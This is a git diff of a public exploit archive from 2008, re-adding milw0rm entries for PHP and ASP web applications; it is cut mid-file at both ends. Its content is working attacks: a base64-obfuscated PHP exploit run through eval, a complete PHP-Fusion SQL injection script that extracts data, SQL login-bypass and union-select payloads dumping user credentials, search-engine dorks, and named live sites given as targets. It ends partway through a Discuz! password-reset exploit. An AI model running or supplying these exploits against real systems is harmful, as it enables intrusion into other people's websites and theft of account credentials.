+ "ZT0ic3VibWl0IiB2YWx1ZT0iQ2hhbmdlIGl0ISI+IDxJTlBVVCB0eXBlPSJyZXNldCI+DQogICAg". + "PC9QPg0KIDwvRk9STT4NCkZGRjsNCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKXskbmV3X3B3". + "ZD1tZDUoJF9QT1NUWyducHcnXSk7JHBvc3Q9InNpdGVuYW1lPS0lMjB3ZWJwb3J0Zm9saW8lMjAt". + "Jl9zdGF0dXNiYXI9c3RhdHVzJTIwYmFyJmJhbm5lcj1jb3B5cmlnaHQmZW1haWw9bWFpbC5nYW5v". + "ayU0MGdtYWlsLmNvbSZwYXNzd29yZD0iLiRuZXdfcHdkLiImcGFzc3dvcmRfcmV0eXBlPSIuJG5l". + "d19wd2QuIlxyXG4iOyRqb2tlID0gIlBPU1QgLyIuJF9QT1NUWyJQQVRIIl0uIi9hZG1pbi91c2Vy". + "aW5mby5waHA/YWN0aW9uPWFjY291bnRfc2F2ZSBIVFRQLzEuMVxyXG5Ib3N0OiAiLiRfUE9TVFsi". + "TVNER05LIl0uIlxyXG5Vc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93". + "cyBOVCA1LjE7IGVuLVVTOyBydjoxLjkpIEdlY2tvLzIwMDgwNTI5MDYgRmlyZWZveC8zLjBcclxu". + "S2VlcC1BbGl2ZTogMzAwXHJcbkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxuQ29udGVudC1UeXBl". + "OiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuQ29udGVudC1MZW5ndGg6IDE5". + "MFxyXG5cclxuIi4kcG9zdDskcmVzID0gIiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbIk1T". + "REdOSyJdLCI4MCIsJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAv". + "PldURiwgZXJyIzogKCRlcnJubykuJGVycnN0ciIpO3JldHVybjt9ZWNobygiPHNwYW4gc3R5bGU9". + "XCJmb250Om5vcm1hbCA4cHQgdGFob21hO1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5b". + "K10gPGI+U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2Up". + "O3doaWxlKCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRh". + "Y2spO2lmIChzdHJpc3RyKCRyZXMsICJzYXZlZCIpKXtlY2hvICJbK108Yj4gRXhwbG9pdGVkICEg". + "LCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3JkIGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAv". + "PiAgICAgWytdIC4uLjxiciAvPiAgICAgWytdIDxiPm5ldyBwYXNzd29yZDo8L2I+ICIuJF9QT1NU". + "WyducHcnXS4iPGJyIC8+ICAgICBbK108Yj4gYWRtaW4gcGFuZWw6PC9iPiBodHRwOi8vIi4kX1BP". + "U1RbIk1TREdOSyJdLiRfUE9TVFsiUEFUSCJdLiIvYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJy". + "IC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h". + "O2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8g". 
+ "IlsrXTxiPiBPb3BzLCBzcnksIG5vdCB2dWxuLi4uITwvYj48YnIgLz5bIV0gPGk+ZG91YmxlIGNo". + "ZWNrIHlvdXIgaW5wdXQuLi48L2k+Ijt9Zmx1c2goKTt9ZWxzZXtlY2hvJEZPUk07fQ0K"; + eval(base64_decode($GNK)); + +/* +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D + [»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah... + [»] Str0ke //Hey Brotha keep rocking on ;) + [»] Saudi-L0rd,Sakab... + [»] SMN,MSD-KiD,SED,AMD,MSN... + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +===============================================================================*/ +?> + +# milw0rm.com [2008-11-20] diff --git a/platforms/php/webapps/7172.txt b/platforms/php/webapps/7172.txt index 08943da8d..1b02f48c8 100755 --- a/platforms/php/webapps/7172.txt +++ b/platforms/php/webapps/7172.txt 
@@ -1,28 +1,28 @@
-[+] Script Name : NATTERCHAT v1.1 remote login bypass
-
-[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT')
-
-[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
-
-[+] Dork : Powered by NATTERCHAT v 1.1
-
---//-->
-
-[+] Expl0iT :
-
-1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp
-
-2) Username : admin
-
- Password : ' or '1'='1
-
-3) You are the Admin now!
-
-N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page
-
-
---//-->
-
-[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ...
-
-# milw0rm.com [2008-11-20]
+[+] Script Name : NATTERCHAT v1.1 remote login bypass
+
+[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT')
+
+[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
+
+[+] Dork : Powered by NATTERCHAT v 1.1
+
+--//-->
+
+[+] Expl0iT :
+
+1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp
+
+2) Username : admin
+
+ Password : ' or '1'='1
+
+3) You are the Admin now!
+
+N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page
+
+
+--//-->
+
+[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ...
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7173.php b/platforms/php/webapps/7173.php
index 059d28d16..bbe576bcf 100755
--- a/platforms/php/webapps/7173.php
+++ b/platforms/php/webapps/7173.php
@@ -1,147 +1,147 @@ -<?php -/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* - PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit - requires magic_quotes == off - - coded by irk4z[at]yahoo.pl - homepage: http://irk4z.wordpress.com - - greets: all friends ;) -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/ - -$host = $argv[1]; -$path = $argv[2]; -$login = $argv[3]; -$pass = $argv[4]; -$sql_injection = $argv[5]; - -echo -"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n". -" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n". -" requires magic_quotes == off\n". -"\n". -" coded by irk4z[at]yahoo.pl\n". -" homepage: http://irk4z.wordpress.com\n". -"\n". -" greets: all friends ;)\n". -"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n"; - -if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){ - echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" . - " php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n". 
- " php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n"; - die; -} - -echo "Logging into system..."; -//login to php-fusion using login and pass -$login_data = send($host, array( "path" => $path."news.php", - "post" => array( - "user_name" => $login, - "user_pass" => $pass, - "login" => "Login" - ) - ) - ); - -//get cookies -preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches); -$cookies = implode(' ', $matches[1]); - -//get user id -preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches); -$my_id = $matches[1][0]; - -if(empty($my_id)){ - echo "\n[x] Incorrect login or password.."; - die; -} else { - echo "[ok]\n"; -} - -$id_message = uniqid(); -$inhex = ''; -for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ; - -echo "Running sql-injection...\n"; -//running sql-injection -$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&", - "cookie" => $cookies, - "post" => array( - "send_message" => 'X', - "subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*", - "message" => "XXX" - ) - ) - ); - -echo "Getting data...\n\n"; -$res = send($host, array( "path" => $path."messages.php?folder=outbox", - "cookie" => $cookies ) - ); - -preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches); -$id_message_number = $matches[1][0]; - -$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number, - "cookie" => $cookies ) - ); - -preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches); - -if( empty($matches[1][0]) ){ - echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n"; -} else { - $tmp = ''; - $hex = $matches[1][0]; - //unhex it! - for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . 
$hex[$i+1])); - echo "DATA: \n".$tmp."\n\n"; -} - -echo "Deleting message...\n"; - -$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number, - "cookie" => $cookies, - "post" => array ( - "delete" => "Delete" - ) - ) - ); - -//send http packet -function send($host, $dane = "") { - $packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n"; - $packet .= "Host: {$host}\r\n"; - - if( !empty($dane['cookie']) ){ - $packet .= "Cookie: {$dane['cookie']}\r\n"; - } - - if( !empty($dane['post']) ){ - $reszta_syfu = ""; - foreach($dane['post'] as $tmp => $tmp2){ - $reszta_syfu .= $tmp . "=" . $tmp2 . "&"; - } - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n"; - $packet .= $reszta_syfu; - } else { - $packet .= "Connection: Close\r\n\r\n"; - } - - $o = @fsockopen($host, 80); - if(!$o){ - echo "\n[x] No response...\n"; - die; - } - fputs($o, $packet); - while (!feof($o)) $ret .= fread($o, 1024); - fclose($o); - return ($ret); -} - -?> - -# milw0rm.com [2008-11-20] +<?php +/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit + requires magic_quotes == off + + coded by irk4z[at]yahoo.pl + homepage: http://irk4z.wordpress.com + + greets: all friends ;) +*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/ + +$host = $argv[1]; +$path = $argv[2]; +$login = $argv[3]; +$pass = $argv[4]; +$sql_injection = $argv[5]; + +echo +"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n". +" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n". +" requires magic_quotes == off\n". +"\n". +" coded by irk4z[at]yahoo.pl\n". +" homepage: http://irk4z.wordpress.com\n". +"\n". +" greets: all friends ;)\n". 
+"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n"; + +if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){ + echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" . + " php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n". + " php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n"; + die; +} + +echo "Logging into system..."; +//login to php-fusion using login and pass +$login_data = send($host, array( "path" => $path."news.php", + "post" => array( + "user_name" => $login, + "user_pass" => $pass, + "login" => "Login" + ) + ) + ); + +//get cookies +preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches); +$cookies = implode(' ', $matches[1]); + +//get user id +preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches); +$my_id = $matches[1][0]; + +if(empty($my_id)){ + echo "\n[x] Incorrect login or password.."; + die; +} else { + echo "[ok]\n"; +} + +$id_message = uniqid(); +$inhex = ''; +for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ; + +echo "Running sql-injection...\n"; +//running sql-injection +$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&", + "cookie" => $cookies, + "post" => array( + "send_message" => 'X', + "subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*", + "message" => "XXX" + ) + ) + ); + +echo "Getting data...\n\n"; +$res = send($host, array( "path" => $path."messages.php?folder=outbox", + "cookie" => $cookies ) + ); + +preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches); +$id_message_number = $matches[1][0]; + +$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number, + "cookie" => $cookies ) + ); + 
+preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches); + +if( empty($matches[1][0]) ){ + echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n"; +} else { + $tmp = ''; + $hex = $matches[1][0]; + //unhex it! + for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1])); + echo "DATA: \n".$tmp."\n\n"; +} + +echo "Deleting message...\n"; + +$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number, + "cookie" => $cookies, + "post" => array ( + "delete" => "Delete" + ) + ) + ); + +//send http packet +function send($host, $dane = "") { + $packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n"; + $packet .= "Host: {$host}\r\n"; + + if( !empty($dane['cookie']) ){ + $packet .= "Cookie: {$dane['cookie']}\r\n"; + } + + if( !empty($dane['post']) ){ + $reszta_syfu = ""; + foreach($dane['post'] as $tmp => $tmp2){ + $reszta_syfu .= $tmp . "=" . $tmp2 . "&"; + } + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n"; + $packet .= $reszta_syfu; + } else { + $packet .= "Connection: Close\r\n\r\n"; + } + + $o = @fsockopen($host, 80); + if(!$o){ + echo "\n[x] No response...\n"; + die; + } + fputs($o, $packet); + while (!feof($o)) $ret .= fread($o, 1024); + fclose($o); + return ($ret); +} + +?> + +# milw0rm.com [2008-11-20] diff --git a/platforms/php/webapps/7175.txt b/platforms/php/webapps/7175.txt index 4892429cd..e45b8e181 100755 --- a/platforms/php/webapps/7175.txt +++ b/platforms/php/webapps/7175.txt 
@@ -1,13 +1,13 @@
-[+] Script Name : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
-[+] Author : Mountassif Moad
-[+] Dork : Powered by Natterchat v1.12
-
-[+] Expl0iT :
-1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
-2) Username : admin
- Password : ' or '1'='1
-
-Live Demo
-http://www.sprq.ca/cgi-bin/natterchat/chat.asp
-
-# milw0rm.com [2008-11-20]
+[+] Script Name : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
+[+] Author : Mountassif Moad
+[+] Dork : Powered by Natterchat v1.12
+
+[+] Expl0iT :
+1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
+2) Username : admin
+ Password : ' or '1'='1
+
+Live Demo
+http://www.sprq.ca/cgi-bin/natterchat/chat.asp
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7176.txt b/platforms/php/webapps/7176.txt
index 503e3b58e..848908fd1 100755
--- a/platforms/php/webapps/7176.txt
+++ b/platforms/php/webapps/7176.txt
@@ -1,42 +1,42 @@
-[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
-
-[>] Discovered by:--> XaDoS
-
-[>] ContacT m&:--> xados[at]hotmail.it
-
-[>] Site:--> http://www.toursmanager.com
-
-#########
-
-[â– ] £XpLoIT:
-
-|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
-
-|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
-
-Version:
-|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
-|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
-
-V=> 5.x.x XD
-
-#########
-[â– ] D&M0:
-
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
-
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
-
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
-
-#########
-
-[â– ] Th4Nks T0:
-
-\> Boom3rang </ (very kind) ;-)
-\> Langy </
-\> Str0ke </
-
-#########
-
-# milw0rm.com [2008-11-20]
+[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
+
+[>] Discovered by:--> XaDoS
+
+[>] ContacT m&:--> xados[at]hotmail.it
+
+[>] Site:--> http://www.toursmanager.com
+
+#########
+
+[â– ] £XpLoIT:
+
+|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
+
+|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
+
+Version:
+|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
+|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
+
+V=> 5.x.x XD
+
+#########
+[â– ] D&M0:
+
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
+
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
+
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
+
+#########
+
+[â– ] Th4Nks T0:
+
+\> Boom3rang </ (very kind) ;-)
+\> Langy </
+\> Str0ke </
+
+#########
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7179.txt b/platforms/php/webapps/7179.txt
index 738117e15..8c23f7597 100755
--- a/platforms/php/webapps/7179.txt
+++ b/platforms/php/webapps/7179.txt
@@ -1,13 +1,13 @@
-==============================================================================
- NATTERCHAT v1.1 Admin Home Bypass Vulnerability
-==============================================================================
- [»] Script : [ NATTERCHAT v1.1 ]
- [»] Discover: [ Mountassif Moad ]
-
-===[ XPL ]===
- [»] http://localhost/[path]/admin/home.php
-===[ LIVE ]===
- [»] http://www.welfarerights.net/natterchat/admin/home.asp
- [»] http://www.natterchat.co.uk/version11/admin/home.asp
-
-# milw0rm.com [2008-11-20]
+==============================================================================
+ NATTERCHAT v1.1 Admin Home Bypass Vulnerability
+==============================================================================
+ [»] Script : [ NATTERCHAT v1.1 ]
+ [»] Discover: [ Mountassif Moad ]
+
+===[ XPL ]===
+ [»] http://localhost/[path]/admin/home.php
+===[ LIVE ]===
+ [»] http://www.welfarerights.net/natterchat/admin/home.asp
+ [»] http://www.natterchat.co.uk/version11/admin/home.asp
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7180.txt b/platforms/php/webapps/7180.txt
index 34349c9d9..c1de56041 100755
--- a/platforms/php/webapps/7180.txt
+++ b/platforms/php/webapps/7180.txt
@@ -1,47 +1,47 @@
-[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
-
-[+] Vcalendar_asp Mdb Vulnerability
-[+]
-[+] ----------------------------------------------------------
-[+] Author : Swan
-[+]
-[+] Date : 20.11.2008
-[+]
-[+] Contact : Swantska@Gmail.Com
-[+]
-[+] -----------------------------------------------------------
-
-Script : Vcalendar_asp
-
-Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir
-
-Dork : "inurl:vcalendar_asp"
-
-Our mdb path : db/VCalendar.mdb
-
-Exploit :
-
-Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb
-
-Step 2 - Download that mdb file and read admin name & pass from "users" table.
-
-Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp
-
-Example :
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp
-
-[+] ----------------------------------------------------------------------
-[+] Special Thanks : str0ke & Turkish Nation
-[+]
-[+] Zone-h.Org & Milw0rm.Com
-[+]
-[+] ----------------------------------------------------------------------
-
-[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
-
-# milw0rm.com [2008-11-20]
+[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
+
+[+] Vcalendar_asp Mdb Vulnerability
+[+]
+[+] ----------------------------------------------------------
+[+] Author : Swan
+[+]
+[+] Date : 20.11.2008
+[+]
+[+] Contact : Swantska@Gmail.Com
+[+]
+[+] -----------------------------------------------------------
+
+Script : Vcalendar_asp
+
+Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir
+
+Dork : "inurl:vcalendar_asp"
+
+Our mdb path : db/VCalendar.mdb
+
+Exploit :
+
+Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb
+
+Step 2 - Download that mdb file and read admin name & pass from "users" table.
+
+Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp
+
+Example :
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp
+
+[+] ----------------------------------------------------------------------
+[+] Special Thanks : str0ke & Turkish Nation
+[+]
+[+] Zone-h.Org & Milw0rm.Com
+[+]
+[+] ----------------------------------------------------------------------
+
+[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7182.txt b/platforms/php/webapps/7182.txt
index 56178f15b..66fcf60ec 100755
--- a/platforms/php/webapps/7182.txt
+++ b/platforms/php/webapps/7182.txt
@@ -1,18 +1,18 @@
-###################################################################################################################
-#Author: Ded MustD!e
-###################################################################################################################
-#Google Dork: com_thyme
-###################################################################################################################
-#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
-###################################################################################################################
-#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
-###################################################################################################################
-
-<creationDate>10/10/2005</creationDate>
-<author>eXtrovert software</author>
-<copyright>eXtrovert software</copyright>
-<authorEmail>thyme@extrosoft.com</authorEmail>
-<authorUrl>www.extrosoft.com</authorUrl>
-<version>1.0</version>
-
-# milw0rm.com [2008-11-21]
+###################################################################################################################
+#Author: Ded MustD!e
+###################################################################################################################
+#Google Dork: com_thyme
+###################################################################################################################
+#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
+###################################################################################################################
+#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
+###################################################################################################################
+
+<creationDate>10/10/2005</creationDate>
+<author>eXtrovert software</author>
+<copyright>eXtrovert software</copyright>
+<authorEmail>thyme@extrosoft.com</authorEmail>
+<authorUrl>www.extrosoft.com</authorUrl>
+<version>1.0</version>
+
+# milw0rm.com [2008-11-21]
diff --git a/platforms/php/webapps/7184.txt b/platforms/php/webapps/7184.txt
index b27ace204..31e4eb2b8 100755
--- a/platforms/php/webapps/7184.txt
+++ b/platforms/php/webapps/7184.txt
@@ -1,49 +1,49 @@
-=========================================================================================
-
-
- [o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
-
- Software : ZoGo-Shop plugin version 1.15.4
- Vendor : http://e107.org/
- Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
- Author : NoGe
- Contact : noge[dot]code[at]gmail[dot]com
- Blog : http://evilc0de.blogspot.com
-
-
-=========================================================================================
-
-
- [o] Vulnerable file
-
- e107_plugins/zogo-shop/product_details.php
-
- $product_ID=$_GET["product"];
-
-
-
- [o] Exploit
-
- http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
-
-
-
- [o] Dork
-
- "Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"
-
-
-=========================================================================================
-
-
- [o] Greetz
-
- MainHack BrotherHood [ http://serverisdown.org/blog/]
- Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
- H312Y yooogy mousekill }^-^{ kaka11 martfella
- skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-
-=========================================================================================
-
-# milw0rm.com [2008-11-22]
+=========================================================================================
+
+
+ [o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
+
+ Software : ZoGo-Shop plugin version 1.15.4
+ Vendor : http://e107.org/
+ Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
+ Author : NoGe
+ Contact : noge[dot]code[at]gmail[dot]com
+ Blog : http://evilc0de.blogspot.com
+
+
+=========================================================================================
+
+
+ [o] Vulnerable file
+
+ e107_plugins/zogo-shop/product_details.php
+
+ $product_ID=$_GET["product"];
+
+
+
+ [o] Exploit
+
+ http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
+
+
+
+ [o] Dork
+
+ "Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"
+
+
+=========================================================================================
+
+
+ [o] Greetz
+
+ MainHack BrotherHood [ http://serverisdown.org/blog/]
+ Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+ H312Y yooogy mousekill }^-^{ kaka11 martfella
+ skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+
+=========================================================================================
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7185.php b/platforms/php/webapps/7185.php
index 33af26330..b11b37d3c 100755
--- a/platforms/php/webapps/7185.php
+++ b/platforms/php/webapps/7185.php
@@ -1,139 +1,139 @@
-#!/usr/bin/php
-<?php
-
-print_r('
-+---------------------------------------------------------------------------+
-Discuz! Reset User Password Exploit
-by 80vul
-team: http://www.80vul.com
-+---------------------------------------------------------------------------+
-');
-
-if ($argc < 6) {
-print_r('
-+---------------------------------------------------------------------------+
-Usage: php '.$argv[0].' host path user mail uid
-host: target server (ip/hostname)
-path: path to discuz
-user: user login name
-mail: user login mail
-uid: user login id
-Example:
-php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
-+---------------------------------------------------------------------------+
-');
-exit;
-}
-
-error_reporting(7);
-ini_set('max_execution_time', 0);
-
-$host = $argv[1];
-$path = $argv[2];
-$user = $argv[3];
-$mail = $argv[4];
-$uid = $argv[5];
-
-$fp = fsockopen($host, 80);
-
-$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Keep-Alive: 300\r\n";
-$data .= "Connection: keep-alive\r\n\r\n";
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp)) {
-$resp .= fread($fp, 1024);
-preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
-if ($hash)
-break;
-}
-
-if ($hash) {
